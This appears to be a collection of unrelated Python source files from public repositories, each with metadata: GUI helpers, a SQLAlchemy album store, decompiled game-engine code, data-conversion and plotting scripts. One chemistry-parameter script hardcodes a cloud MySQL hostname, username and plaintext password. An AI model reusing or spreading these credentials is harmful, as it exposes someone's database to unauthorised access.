| 2016-09-06T10:12:14.528565
| 2015-05-19T16:20:24
| 2015-05-19T16:20:24
| 820,388
| 11
| 6
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 918
|
py
|
# -*- coding: utf-8 -*-
### BEGIN LICENSE
# This file is in the public domain
### END LICENSE
"""Helpers for an Ubuntu application."""
__all__ = [
'make_window',
]
import os
import gtk
from foo.fooconfig import get_data_file
import gettext
from gettext import gettext as _
gettext.textdomain('foo')
def get_builder(builder_file_name):
"""Return a fully-instantiated gtk.Builder instance from specified ui
file
:param builder_file_name: The name of the builder file, without extension.
Assumed to be in the 'ui' directory under the data path.
"""
# Look for the ui file that describes the user interface.
ui_filename = get_data_file('ui', '%s.ui' % (builder_file_name,))
if not os.path.exists(ui_filename):
ui_filename = None
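    # NOTE: gtk.Builder.add_from_file() below will raise if the .ui file was
    # not found and ui_filename is still None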
builder = gtk.Builder()
builder.set_translation_domain('foo')
builder.add_from_file(ui_filename)
return builder
|
[
"lforet@VMUb104nb32.(none)"
] |
lforet@VMUb104nb32.(none)
|
9e5bc8ea425225bd8fd3614d92049ac2d4ca9c84
|
2bc8d54ca2db5c3e292eac0bd3c55e2322aff1a2
|
/album.py
|
e76f3654aba253548da5d14cf0142c40a17744c8
|
[] |
no_license
|
SammyJoskey/Album_server_tort
|
d528955eaf578d40a719f2230c5dde19a031dba0
|
ad2a5b6afc8103c7976cee9659264860eec3483c
|
refs/heads/master
| 2020-09-11T11:01:52.994879
| 2019-11-16T03:49:11
| 2019-11-16T03:49:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,019
|
py
|
import sqlalchemy as sa
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
DB_PATH = "sqlite:///albums.sqlite3"
Base = declarative_base()
class Album(Base):
"""
    Describes the structure of the "album" table that stores music library records
"""
__tablename__ = "album"
id = sa.Column(sa.INTEGER, primary_key=True)
year = sa.Column(sa.INTEGER)
artist = sa.Column(sa.TEXT)
genre = sa.Column(sa.TEXT)
album = sa.Column(sa.TEXT)
def connect_db():
"""
    Connects to the database, creates the tables if they do not exist yet, and returns a session object
"""
engine = sa.create_engine(DB_PATH)
Base.metadata.create_all(engine)
session = sessionmaker(engine)
return session()
def find(artist):
"""
    Finds all albums in the database for the given artist
"""
session = connect_db()
albums = session.query(Album).filter(Album.artist == artist).all()
return albums
def find_album(artist, album):
"""
    Checks whether the given album by the given artist exists in the database
"""
session = connect_db()
album = session.query(Album).filter(Album.artist == artist).filter(Album.album == album).first()
return album
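# NOTE: is_number("0") returns 0, which is falsy; compare the result against
# False explicitly rather than truth-testing it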
def is_number(a):
    try:
        return int(a)
    except ValueError:
        return False
def album_add(year, artist, genre, album):
"""
    Takes the album data, creates an Album object and adds it to the database
"""
session = connect_db()
NewAlbum = Album(year = year, artist = artist, genre = genre, album = album)
session.add(NewAlbum)
session.commit()
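# Minimal usage sketch (hypothetical data; writes to albums.sqlite3):
# album_add(1973, "Pink Floyd", "Progressive rock", "The Dark Side of the Moon")
# print(find("Pink Floyd"))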
|
[
"noreply@github.com"
] |
SammyJoskey.noreply@github.com
|
d38891adee6974076d9d9ce77f2f863dc646f125
|
fe19d2fac4580d463132e61509bd6e3cc2cf958d
|
/direct/distributed/ParentMgr.pyc.py
|
ff07f655ba0d007a9501f9565880fc15a35116ed
|
[] |
no_license
|
t00nt0wn1dk/c0d3
|
3e6db6dd42c3aa36ad77709cf9016176a3f3a44f
|
7de105d7f3de0f8704b020e32fd063ee2fad8d0d
|
refs/heads/master
| 2021-01-01T16:00:15.367822
| 2015-03-21T21:25:52
| 2015-03-21T21:25:55
| 32,647,654
| 3
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,588
|
py
|
# 2013.08.22 22:14:09 Pacific Daylight Time
# Embedded file name: direct.distributed.ParentMgr
from direct.directnotify import DirectNotifyGlobal
from direct.showbase.PythonUtil import isDefaultValue
import types
class ParentMgr():
__module__ = __name__
notify = DirectNotifyGlobal.directNotify.newCategory('ParentMgr')
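    # Maps parent tokens to scene-graph NodePaths; children that request a
    # parent token before it is registered are parked under 'hidden' and
    # reparented once registerParent() is called with that token.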
def __init__(self):
self.token2nodepath = {}
self.pendingParentToken2children = {}
self.pendingChild2parentToken = {}
def destroy(self):
del self.token2nodepath
del self.pendingParentToken2children
del self.pendingChild2parentToken
def privRemoveReparentRequest(self, child):
if child in self.pendingChild2parentToken:
self.notify.debug("cancelling pending reparent of %s to '%s'" % (repr(child), self.pendingChild2parentToken[child]))
parentToken = self.pendingChild2parentToken[child]
del self.pendingChild2parentToken[child]
self.pendingParentToken2children[parentToken].remove(child)
def requestReparent(self, child, parentToken):
if self.token2nodepath.has_key(parentToken):
self.privRemoveReparentRequest(child)
self.notify.debug("performing wrtReparent of %s to '%s'" % (repr(child), parentToken))
child.wrtReparentTo(self.token2nodepath[parentToken])
else:
if isDefaultValue(parentToken):
self.notify.error('child %s requested reparent to default-value token: %s' % (repr(child), parentToken))
self.notify.debug("child %s requested reparent to parent '%s' that is not (yet) registered" % (repr(child), parentToken))
self.privRemoveReparentRequest(child)
self.pendingChild2parentToken[child] = parentToken
self.pendingParentToken2children.setdefault(parentToken, [])
self.pendingParentToken2children[parentToken].append(child)
child.reparentTo(hidden)
def registerParent(self, token, parent):
if self.token2nodepath.has_key(token):
self.notify.error("registerParent: token '%s' already registered, referencing %s" % (token, repr(self.token2nodepath[token])))
if isDefaultValue(token):
self.notify.error('parent token (for %s) cannot be a default value (%s)' % (repr(parent), token))
if type(token) is types.IntType:
if token > 4294967295L:
self.notify.error('parent token %s (for %s) is out of uint32 range' % (token, repr(parent)))
self.notify.debug("registering %s as '%s'" % (repr(parent), token))
self.token2nodepath[token] = parent
if token in self.pendingParentToken2children:
children = self.pendingParentToken2children[token]
del self.pendingParentToken2children[token]
for child in children:
self.notify.debug("performing reparent of %s to '%s'" % (repr(child), token))
child.reparentTo(self.token2nodepath[token])
del self.pendingChild2parentToken[child]
def unregisterParent(self, token):
if not self.token2nodepath.has_key(token):
self.notify.warning("unregisterParent: unknown parent token '%s'" % token)
return
self.notify.debug("unregistering parent '%s'" % token)
del self.token2nodepath[token]
# okay decompyling C:\Users\Maverick\Documents\Visual Studio 2010\Projects\Unfreezer\py2\direct\distributed\ParentMgr.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2013.08.22 22:14:09 Pacific Daylight Time
|
[
"anonymoustoontown@gmail.com"
] |
anonymoustoontown@gmail.com
|
6d254711fd27acbd4b96f4a8d2a241f1d3f2a31a
|
b4f8c4789dfa9110d1d7907da5aefb7704d37f69
|
/q8.py
|
e39e16bba3a7f861f124aff01f98474b0fda114e
|
[] |
no_license
|
DeSales-Code-Jam-2020/code-jam2020-JordandEntremont
|
118cf52bb5987573e383d82543d2823acaff81c7
|
3c15a988b6a27a0c0ac7981711a4abb558e49c1d
|
refs/heads/master
| 2023-01-01T23:47:20.832394
| 2020-10-24T18:09:51
| 2020-10-24T18:09:51
| 306,923,399
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 280
|
py
|
def main(int1, int2, int3, int4, int5, int6, int7, int8):
return ""
if __name__ == "__main__":
print(
main(
# just trust me don't touch this - Jake Gadaleta
*map(lambda x: int(x), input("Input: ").strip().split(" "))
)
)
|
[
"66690702+github-classroom[bot]@users.noreply.github.com"
] |
66690702+github-classroom[bot]@users.noreply.github.com
|
ba6fe39e48cfdfebaca8e32ce5d1d8c059b308bd
|
2f254710e5e283c4d294609db30fd4e6e0df00da
|
/hw4_part1/locators.py
|
7ed882fe3190f61e8411c1e0469b395f222b2955
|
[] |
no_license
|
Silberlightning/stepik_test_automatization
|
58617b5e2d22b3fc101df92ee9f540da0577c61d
|
240154fcdad85c85de6b85bb0bb26dd696e27f95
|
refs/heads/master
| 2022-12-29T06:41:55.768392
| 2020-10-16T07:01:28
| 2020-10-16T07:01:28
| 296,555,561
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 187
|
py
|
link = "http://selenium1py.pythonanywhere.com"
search_input = "//input[@type='search']"
search_text = "tattoo"
button_search = "input.btn.btn-default"
button = "//button[@type='submit']"
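# note: search_input and button are XPath locators; button_search is a CSS selector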
|
[
"spogulit@gmail.com"
] |
spogulit@gmail.com
|
f7b6a2f605040d7e8a54563e526b8fb4116d6709
|
73898b07671733fed85149f4c4280972ac9a32e5
|
/reading_parameters.py
|
5f80a4b2540a71be911ccb1715e6597cd269b093
|
[] |
no_license
|
yhb8r4/iSpiEFP_Database_Search_Engine
|
bf94bd6db970e449c7fa7fcb1f935301f6007949
|
d702f420fa5833d012fc9a68af7ed3953f876132
|
refs/heads/master
| 2020-03-17T15:41:17.928658
| 2018-05-15T23:03:22
| 2018-05-15T23:03:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,831
|
py
|
# coding: utf-8
# In[3]:
import datetime
import sys
import mysql
import mysql.connector
db = mysql.connector.connect(host="ssi-db.cllylwkcavdc.us-east-2.rds.amazonaws.com",
user="lslipche",
passwd="29221627",
db="SSI_test")
cur = db.cursor()
# In[4]:
#check_data(cur)
#define all python functions to read in parameter file and extract information
def read_coord(file):
print(file)
"""
lines=[]
with open(file) as parameter:
for line in parameter:
if line.strip() == 'COORDINATES (BOHR)':
break
for line in parameter:
if line.strip() == 'STOP':
break
lines.append(line)
"""
with open(file) as parameter:
xyz=[]
for i in parameter:
parts = i.split()
if len(parts) == 4:
atoms = parts[0]
coord = parts[1:4]
new_coord = [coord for coord in list(map(float,coord))]
new_coord.insert(0,atoms)
xyz.append(new_coord)
return xyz
#gets coordinates in the xyz array
def get_coord(file):
xyz=read_coord(file)
new_array=[]
for i in xyz:
new_array.append(i)
for line in new_array:
if "O" in line[0]:
new_array[new_array.index(line)][0] = "O"
if "C" in line[0]:
new_array[new_array.index(line)][0] = "C"
if "H" in line[0]:
new_array[new_array.index(line)][0] = "H"
if "N" in line[0]:
new_array[new_array.index(line)][0] = "N"
if "S" in line[0]:
new_array[new_array.index(line)][0] = "S"
return new_array
#for line in new_array:
# print ' '.join(map(str,line))
#counts and tallies up atoms from coordinate file
def get_chem_formula(file):
array=get_coord(file)
C=H=N=S=O=0
for i in array:
if 'O' in i[0]:
O+=1
if 'C' in i[0]:
C+=1
if 'N' in i[0]:
N+=1
if 'H' in i[0]:
H+=1
if 'S' in i[0]:
S+=1
formula={"C":int(C),"H":int(H), "N":int(N), "S":int(S), "O":int(O)}
chemicals=""
for j in formula:
if formula[j] != 0:
chemicals += j+ str(formula[j])
return chemicals
#extracts the full textfile
def get_parameters(file):
lines=[]
with open(file) as parameter:
for line in parameter:
lines.append(line)
return lines
"""
parameter=('h2o.efp')
#parameter=str(sys.argv[1])
#extract coords, chemical formula, and EFP parameter into string variables (coord_str, form, parm_str).
coord=get_coord(parameter)
#print(coord)
coord_str="\n".join(str(i) for i in coord)
form=get_chem_formula(parameter)
#print(form)
parm=get_parameters(parameter)
parm_str='\n'.join(parm)
#print(parm_str)
#insert parameters into tables
#columns: fragment, chemicalformula, coordinates, parameters
#all data must be read in as a string.
#print(type(parameter), type(form), type(coord_str), type(parm_str))
current_timestamp = datetime.datetime.now()
#tables = cur.execute("INSERT INTO SSI_sub(date,fragment,chemicalformula,coordinates,parameters) VALUES (%s,%s,%s,%s,%s);", (current_timestamp, parameter, form, coord_str, parm_str))
#print("execute result", tables)
#print(dir(cur))
#print(cur._warnings)
#db.commit()
"""
# In[20]:
def ensure_str(s):
if isinstance(s, str):
s = s.encode('utf-8')
return s
def query(string):
db = mysql.connector.connect(host="ssi-db.cllylwkcavdc.us-east-2.rds.amazonaws.com",
user="lslipche",
passwd="29221627",
db="SSI_test")
cur = db.cursor()
#string=str(sys.argv[1])
string="SELECT chemicalformula,coordinates FROM SSI_sub"
cur.execute(string)
entry=[]
for i in cur.fetchall():
entry.append(ensure_str(i[0]))
return entry
#print entry.append(ensure_str(i[3]))
#return entry
#print entry[3].strip("\n").replace('\"','').split('\n')[0]
"""
# In[100]:
cur.execute('TRUNCATE TABLE SSI_sub')
# In[10]:
get_coord(parameter)
# In[21]:
query('test')
"""
# In[24]:
def strip_text(text):
#strips the string of brackets and quotation marks for better readability
unwanted={"'":"", "[":"", "]":"", ",":"", "b":" "}
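    # the "b" entry strips the bytes-literal prefix (e.g. b'...') from
    # stringified rows, but it will also blank any other literal letter b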
for i, j in unwanted.items():
text=text.replace(i,j)
return text
def query_return_coord(parameter):
    # query() ignores its argument and always runs the same SELECT
    coord = query(parameter)
    return [strip_text(str(i)) for i in coord]
#return strip_text(str(i))
#return " ".join(i).replace("'", " ").replace("]", "").replace("[","").replace(",","")
"""
# In[25]:
query_return_coord('parameter')
# In[7]:
get_multipoles(parameter)
"""
# In[8]:
def get_multipoles(file):
    # single pass over the file, keyed on the current section header; keep the
    # four sections in separate lists (a chained assignment such as
    # monopoles=dipoles=...=[] would alias all four names to one shared list)
    multipoles = {'MONOPOLES': [], 'DIPOLES': [], 'QUADRUPOLES': [], 'OCTUPOLES': []}
    current = None
    with open(file) as parameter:
        for line in parameter:
            key = line.strip()
            if key in multipoles:
                current = key
            elif key == 'STOP':
                current = None
            elif current is not None:
                multipoles[current].append(line)
    print('MONOPOLES')
    return multipoles.get('MONOPOLES')
"""
# In[9]:
get_multipoles(parameter)
"""
# In[69]:
def get_polarizable_pts(file):
polarizable_pts=[]
with open(file) as parameter:
for line in parameter:
if line.strip() == 'POLARIZABLE POINTS':
break
for line in parameter:
if line.strip() == 'STOP':
break
polarizable_pts.append(line)
return polarizable_pts
# In[70]:
def get_dynamic_polarizable_pts(file):
dynamic_polarizable_pts=[]
with open(file) as parameter:
for line in parameter:
if line.strip() == 'DYNAMIC POLARIZABLE POINTS':
break
for line in parameter:
if line.strip() == 'STOP':
break
dynamic_polarizable_pts.append(line)
return dynamic_polarizable_pts
# In[71]:
def get_projection_basis_set(file):
projection_basis_set=[]
with open(file) as parameter:
for line in parameter:
            if line.strip() == 'PROJECTION BASIS SET':
break
for line in parameter:
if line.strip() == 'STOP':
break
projection_basis_set.append(line)
return projection_basis_set
# In[72]:
def get_multiplicity(file):
import re
multiplicity=[]
with open(file) as parameter:
for line in parameter:
if 'MULTIPLICITY' in line.strip():
multiplicity.append(float(re.split('\s+',line)[2]))
return multiplicity
"""
# In[73]:
get_multiplicity(parameter)
"""
# In[76]:
def get_projection_wavefunction(file):
import re
copy=False
projection_wavefunction=[]
with open(file) as parameter:
for line in parameter:
if 'PROJECTION WAVEFUNCTION' in line.strip():
copy=True
projection_wavefunction.append(float(re.split('\s+',line)[3]))
projection_wavefunction.append(float(re.split('\s+',line)[4]))
elif line.strip() == 'FOCK MATRIX ELEMENTS':
copy = False
elif copy:
projection_wavefunction.append(line)
return projection_wavefunction
"""
# In[77]:
get_projection_wavefunction(parameter)
"""
# In[78]:
def get_fock_matrix(file):
import re
copy=False
fock_matrix=[]
with open(file) as parameter:
for line in parameter:
if 'FOCK MATRIX ELEMENTS' in line.strip():
copy=True
elif line.strip() == 'LMO CENTROIDS':
copy = False
elif copy:
fock_matrix.append(line)
return fock_matrix
"""
# In[79]:
get_fock_matrix(parameter)
"""
# In[80]:
def get_lmo_centroids(file):
copy=False
lmo_centroids=[]
with open(file) as parameter:
for line in parameter:
if 'LMO CENTROIDS' in line.strip():
copy=True
elif line.strip() == 'STOP':
copy = False
elif copy:
lmo_centroids.append(line)
return lmo_centroids
# In[81]:
def get_canonvec(file):
import re
copy=False
canonvec=[]
with open(file) as parameter:
for line in parameter:
if 'CANONVEC' in line.strip():
copy=True
canonvec.append(float(re.split('\s+',line)[2]))
canonvec.append(float(re.split('\s+',line)[3]))
elif line.strip() == 'CANONFOK':
copy = False
elif copy:
canonvec.append(line)
return canonvec
"""
# In[82]:
get_canonvec(parameter)
"""
# In[83]:
def get_canonfok(file):
copy=False
canonfok=[]
with open(file) as parameter:
for line in parameter:
if 'CANONFOK' in line.strip():
copy=True
elif line.strip() == 'STOP':
copy = False
elif copy:
canonfok.append(line)
return canonfok
# In[84]:
def get_screen3(file):
import re
copy=False
screen3=[]
with open(file) as parameter:
for line in parameter:
if 'SCREEN3' in line.strip():
copy=True
screen3.append(float(re.split('\s+',line)[2]))
screen3.append(float(re.split('\s+',line)[3]))
elif line.strip() == 'SCREEN3':
copy = False
elif copy:
screen3.append(line)
return screen3
"""
# In[85]:
get_screen3(parameter)
"""
# In[86]:
def get_screen2(file):
import re
copy=False
screen2=[]
with open(file) as parameter:
for line in parameter:
if 'SCREEN2' in line.strip():
copy=True
screen2.append(re.split('\s+',line)[3])
elif line.strip() == 'STOP':
copy = False
elif copy:
screen2.append(line)
return screen2
"""
# In[87]:
get_screen2(parameter)
"""
# In[40]:
def get_screen(file):
import re
copy=False
screen=[]
with open(file) as parameter:
for line in parameter:
if 'SCREEN (' in line.strip():
copy=True
screen.append(re.split('\s+',line)[3])
elif line.strip() == 'STOP':
copy = False
elif copy:
screen.append(line)
return screen
"""
# In[41]:
type(get_screen(parameter))
"""
# In[35]:
def query_2(get_coordinates):
db = mysql.connector.connect(host="ssi-db.cllylwkcavdc.us-east-2.rds.amazonaws.com",
user="lslipche",
passwd="29221627",
db="SSI_test")
cur = db.cursor()
#string=str(sys.argv[1])
string="SELECT chemicalformula FROM SSI_sub"
cur.execute(string)
entry=[]
for (chemicalformula) in cur:
print("{}".format(chemicalformula))
cur.close()
db.close()
"""
# In[36]:
query_2('test')
"""
|
[
"jcheoh@purdue.edu"
] |
jcheoh@purdue.edu
|
81fc1f0cf7bd713acd89b9c9ac98598da2f45ba8
|
49ed844c2f132e0bc64b3e1b7499823d0e173dc0
|
/code/DataConverter.py
|
d040ed44bb11f562004d053c11254cee1be9cfb7
|
[] |
no_license
|
chihming/DataTransformer
|
6f6c3c465e5f2c9d0718b169fc9a872342b07552
|
030ae1db018cdc6cda6ac13d2c47071ea89d131f
|
refs/heads/master
| 2020-12-30T09:57:47.910862
| 2017-03-08T08:21:35
| 2017-03-08T08:21:35
| 26,474,964
| 3
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,077
|
py
|
from code.FeatureMaker import FeatureMaker
from code.Encoder import Encoder
from random import shuffle
from collections import defaultdict
class DataConverter:
logger = None
fmaker = None
encoder = Encoder()
def DumpMapping(self, mfile):
self.encoder.dump_map(mfile)
def __init__(self, logger):
self.logger = logger
self.fmaker = FeatureMaker(logger)
pass
def JoinData(self, infile, relfile, sep, rsep, header, join_column):
"""
Join data features
"""
self.logger.info("Load data")
indata = [ line.rstrip().split(sep) for line in open(infile[0]) ]
dataout = indata[:]
dmap = {}
for e, columns in enumerate(join_column):
self.logger.info("Join columns: %s" % columns)
dmap.clear()
tcolumn, jcolumn = columns.split(':')
tcolumn = int(tcolumn)
jcolumn = int(jcolumn)
reldata = [ line.rstrip().split(rsep) for line in open(relfile[e]) ]
for line in reldata:
key = line[jcolumn]
del line[jcolumn]
dmap[key] = line
dataout = [ a + b for a, b in zip( dataout, [dmap[key] for key in zip(*(indata))[tcolumn]] ) ]
dataout = [ sep.join(cdata) for cdata in dataout ]
return dataout
def SplitData(self, infile, target_column, sep, header, ratio, method):
"""
Split data into training / testing data
"""
self.logger.info("Get unique targets")
target_unique = {}
with open(infile[0]) as f:
for line in f:
target = line.rstrip().split(sep)[target_column]
target_unique[target] = 1
target_unique = target_unique.keys()[:]
self.logger.info("split target")
shuffle(target_unique)
cut_off = int( len(target_unique) * float(ratio[0]) )
target_train = { t:1 for t in target_unique[:cut_off] }
#target_test = { t:1 for t in target_unique[cut_off:] }
self.logger.info("total targets: %d, pure train targets: %d" % (len(target_unique), len(target_unique) * float(ratio[0])))
self.logger.info("split data")
datamap = defaultdict(list)
dataoutTrain = []
dataoutTest = []
with open(infile[0]) as f:
for line in f:
target = line.rstrip().split(sep)[target_column]
datamap[target].append(line.rstrip())
thres = 10
self.logger.info("filter data less than %d" % thres)
if method == 'random': #FIXME not random?
for target in datamap:
if len(datamap[target]) < thres: continue
if target in target_train:
for log in datamap[target]:
dataoutTrain.append(log)
else:
cut_off = int( round( len(datamap[target]) * float(ratio[2]), 0) )
_datamap = datamap[target][:]
shuffle(_datamap)
for log in _datamap[:cut_off]:
dataoutTrain.append(log)
for log in _datamap[cut_off:]:
dataoutTest.append(log)
return dataoutTrain, dataoutTest
def DatatoLib(self, infile, outfile, target_column, sep, msep, offset, header, alpha, normalized, c_columns, n_columns, knn, process):
"""
Convert CSV data to libSVM/libFM format
"""
self.logger.info("Load data")
self.encoder.set_offset(offset)
data = []
k_columns = []
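        # each knn entry is a "k:acolumn:bcolumn" string: take k nearest
        # neighbours for column acolumn, with similarity computed from column bcolumn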
for tp in knn:
k, acolumn, bcolumn = tp.split(':')
k_columns.append(int(acolumn))
all_columns = c_columns + n_columns + k_columns
unique_fea = {}
for idx in c_columns: unique_fea[idx] = {}
for idx in n_columns: unique_fea[idx] = {}
for idx in k_columns: unique_fea[idx] = {}
for fname in infile:
self.logger.info("Get unique feature from '%s'" % (fname))
with open(fname, 'r') as f:
if header: next(f)
for line in f:
line = line.rstrip('\n').split(sep)
for idx in all_columns:
unique_fea[idx][line[idx]] = 1
self.logger.info("Encode data")
for idx in c_columns:
label = 'Cat ' + str(idx)
self.encoder.encode_categorical( unique_fea[idx].keys(), msep=msep, label=label )
self.logger.info("label: %s\tnew labels: %d\tMAX: %d" % (label, self.encoder.get_label_len(label), self.encoder.get_max_index()) )
for idx in n_columns:
label = 'Num ' + str(idx)
self.encoder.encode_categorical( unique_fea[idx].keys(), msep=msep, label=label )
self.logger.info("label: %s\tnew labels: %d\tMAX: %d" % (label, self.encoder.get_label_len(label), self.encoder.get_max_index()) )
for idx in k_columns:
label = 'Sim ' + str(idx)
self.encoder.encode_categorical( unique_fea[idx].keys(), msep=msep, label=label )
self.logger.info("label: %s\tnew labels: %d\tMAX: %d" % (label, self.encoder.get_label_len(label), self.encoder.get_max_index()) )
# KNN
nn = {}
if knn is not None:
self.logger.info("Compute Similarity Feature")
for tp in knn:
tempnn = {}
k, acolumn, bcolumn = map(int, tp.split(':'))
nn[acolumn] = {}
for a in unique_fea[acolumn].keys():
tempnn[a] = []
with open(infile[0]) as f:
if header: next(f)
for line in f:
line = line.rstrip().split(sep)
tempnn[ line[acolumn] ].append(line[bcolumn])
self.logger.info("Get column %d similarities based on column %d" % (acolumn, bcolumn))
nn[acolumn] = self.fmaker.pairwise_similarity(tempnn, k, alpha, process=process)
# Data Transforming
converted = []
dataout = []
out = []
for ifname, ofname in zip(infile, outfile):
self.logger.info("Data Transforming on '%s' to '%s'" % (ifname, ofname))
del converted[:]
with open(ifname, 'r') as f:
if header: next(f)
for line in f:
del out[:]
line = line.rstrip('\n').split(sep)
out.append(line[target_column])
for idx in c_columns:
label = 'Cat ' + str(idx)
out.append( self.encoder.fit_categorical( line[idx], msep, label=label ) )
for idx in n_columns:
label = 'Num ' + str(idx)
out.append( self.encoder.fit_numeric( line[idx], label=label ) )
for idx in k_columns:
label = 'Sim ' + str(idx)
fea_vec = nn[idx][line[idx]] if line[idx] in nn[idx] else ""
out.append( self.encoder.fit_feature( fea_vec, msep='|', label=label, normalized=normalized ) )
converted.append("%s" % (" ".join(out)))
self.logger.info("Write encoded data to '%s'" % (ofname))
with open(ofname, 'w') as f:
f.write("%s\n" % ("\n".join(converted)))
def DatatoRel(self, infile, relfile, target_column, rtarget_column, sep, rsep, msep, offset, header, alpha, normalized, c_columns, n_columns, knn, process):
"""
Convert data to relational data format
"""
self.encoder.set_offset(offset)
self.logger.info("Load data")
Train = None
if len(knn) > 0:
Train = [ line.split(sep) for line in open(infile[0]) ]
Test = [ line.split(sep) for line in open(infile[0]) ]
targetTrain = [ line.rstrip('\n').split(sep)[target_column] for line in open(infile[0]) ]
targetTest = [ line.rstrip('\n').split(sep)[target_column] for line in open(infile[1]) ]
if header:
keymap = { value:str(idx) for idx, value in enumerate( [line.rstrip('\n').split(rsep)[rtarget_column] for line in open(relfile)] , -1) }
else:
keymap = { value:str(idx) for idx, value in enumerate( [line.rstrip('\n').split(rsep)[rtarget_column] for line in open(relfile)] ) }
datamapTrain = [ keymap[v] if v in keymap else keymap['-1'] for v in targetTrain ]
datamapTest = [ keymap[v] if v in keymap else keymap['-1'] for v in targetTest ]
data = [ line.rstrip('\n').split(rsep) for line in open(relfile) ]
dim = len(data[0])
nn = {}
k_columns = []
if len(knn) > 0:
k_columns = [ int(rtarget_column) ]
if header:
header = data[0]
datamapTrain = datamapTrain[1:]
datamapTest = datamapTest[1:]
data = data[1:]
self.logger.info("Encode data")
for idx in range(dim):
if idx in c_columns:
label = 'Cat ' + str(idx)
self.encoder.encode_categorical( set(zip(*data)[idx]), msep=msep, label=label )
self.logger.info("label: %s\tlength: %d\tMAX: %d" % (label, self.encoder.get_label_len(label), self.encoder.get_max_index()) )
elif idx in n_columns:
label = 'Num ' + str(idx)
self.encoder.encode_numeric( set(zip(*data)[idx]), label=label )
self.logger.info("label: %s\tlength: %d\tMAX: %d" % (label, self.encoder.get_label_len(label), self.encoder.get_max_index()) )
if idx in k_columns:
label = 'Sim ' + str(rtarget_column)
self.encoder.encode_categorical( set(zip(*(data))[idx]), msep=msep, label=label )
self.logger.info("label: %s\tlength: %d\tMAX: %d" % (label, self.encoder.get_label_len(label), self.encoder.get_max_index()) )
# KNN
if len(knn) > 0:
self.logger.info("Compute Similarity Feature")
#Train = [ record for record in Train if float(record[3]) >= 3.]
for tp in knn:
tempnn = {}
k, acolumn, bcolumn = tp.split(':')
k = int(k)
acolumn = int(acolumn)
bcolumn = int(bcolumn)
nn[rtarget_column] = {}
for a in set(list(zip(*(Train))[acolumn])):
tempnn[a] = []
for a, b in zip( list(zip(*(Train))[acolumn]), list(zip(*(Train))[bcolumn]) ):
tempnn[a].append(b)
self.logger.info("Get column %d similarities based on column %d" % (acolumn, bcolumn))
#nn[acolumn] = self.fmaker.pairwise_similarity(tempnn, k, alpha, process=process)
nn[rtarget_column] = self.fmaker.pairwise_similarity(tempnn, k, alpha, process=process)
self.logger.info("Transform data")
converted = [ ["0" for i in range(len(data))] ]
for idx in range(dim):
if idx in c_columns:
label = 'Cat ' + str(idx)
converted.append( self.encoder.fit_categorical( zip(*data)[idx], msep, label=label ) )
elif idx in n_columns:
label = 'Num ' + str(idx)
converted.append( self.encoder.fit_numeric( zip(*data)[idx], label=label ) )
if idx in k_columns:
label = 'Sim ' + str(rtarget_column)
fea_matrix = [ nn[idx][fea] if fea in nn[idx] else "" for fea in zip(*data)[idx] ]
converted.append( self.encoder.fit_feature( fea_matrix, msep='|', label=label, normalized=normalized ) )
dataout = [ "%s" % (" ".join(cdata)) for cdata in zip(*converted) ]
return dataout, datamapTrain, datamapTest, self.encoder.get_max_index()-1
|
[
"changecandy@gmail.com"
] |
changecandy@gmail.com
|
675c71140cbfcee82e787b7f764cf0d7d3aed625
|
102b3420849d7d60c023714002fd44368baef40a
|
/firstPy/数据挖掘/first.py
|
664e8cb4699446349408e643d78fe499ea65cb1d
|
[] |
no_license
|
cash2one/python_code
|
d5a13e8b7c875a6922de3c9649305d77e792c7d8
|
2513a1b6152f4b6e6c9d9c66983d2b70658d4118
|
refs/heads/master
| 2021-01-13T03:45:55.847571
| 2016-08-26T08:44:24
| 2016-08-26T08:44:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,538
|
py
|
# -*- coding: utf-8 -*-
import urllib2
url = 'http://aima.cs.berkeley.edu/data/iris.csv'
#u = urllib2.urlopen(url).read()
dir = '/Users/bjhl/Documents/data_mining/'
filename = 'iris.csv'
# with open(dir+filename,'w') as fw:
# fw.write(u)
# fw.flush()
#print u
from numpy import genfromtxt, zeros
#read the first 4 columns
#data = genfromtxt(url,delimiter=',',usecols=(0,1,2,3))
data = genfromtxt(dir+filename,delimiter=',',usecols=(0,1,2,3))
print data.shape
print type(data)
# read the fifth column
#target = genfromtxt(url,delimiter=',',usecols=(4),dtype=str)
target = genfromtxt(dir+filename,delimiter=',',usecols=(4),dtype=str)
print target.shape
print type(target)
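# iris.csv layout: four numeric columns (sepal/petal length and width) plus a
# fifth column holding the species name, used here as the class label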
# from pylab import plot,show
# plot(data[target=='setosa',0],data[target=='setosa',2],'bo')
# plot(data[target=='versicolor',0],data[target=='versicolor',2],'ro')
# plot(data[target=='virginica',0],data[target=='virginica',2],'go')
# show()
from pylab import figure, subplot, hist, xlim, show
xmin = min(data[:,0])
xmax = max(data[:,0])
print xmax,xmin
print figure()
subplot(411) # distribution of the setosa class (1st, on the top)
hist(data[target=='setosa',0],color='b',alpha=.7)
xlim(xmin,xmax)
subplot(412) # distribution of the versicolor class (2nd)
hist(data[target=='versicolor',0],color='r',alpha=.7)
xlim(xmin,xmax)
subplot(413) # distribution of the virginica class (3rd)
hist(data[target=='virginica',0],color='g',alpha=.7)
xlim(xmin,xmax)
subplot(414) # global histogram (4th, on the bottom)
hist(data[:,0],color='y',alpha=.7)
xlim(xmin,xmax)
show()
|
[
"bjhl@WHYF-2788.local"
] |
bjhl@WHYF-2788.local
|
7bd52c55aa838536139a4338c6a12b2e5810d847
|
52052b8f513b64b62a115b1de1f1727398fa9e77
|
/zip.py
|
356a2745ca342e5f76aa9593554a9e55d1d07b39
|
[] |
no_license
|
vlakhani28/Python-Learn
|
eb22a2209307f7ac8725e8a70c14eca860c3bcea
|
4785544384432c7cf42de96f5b865d3948b9fb7b
|
refs/heads/master
| 2020-11-26T09:22:44.868343
| 2019-12-30T05:06:10
| 2019-12-30T05:06:10
| 226,358,656
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 69
|
py
|
a = ("Hi","Bye")
b = ("VL","Meet you","Soon")
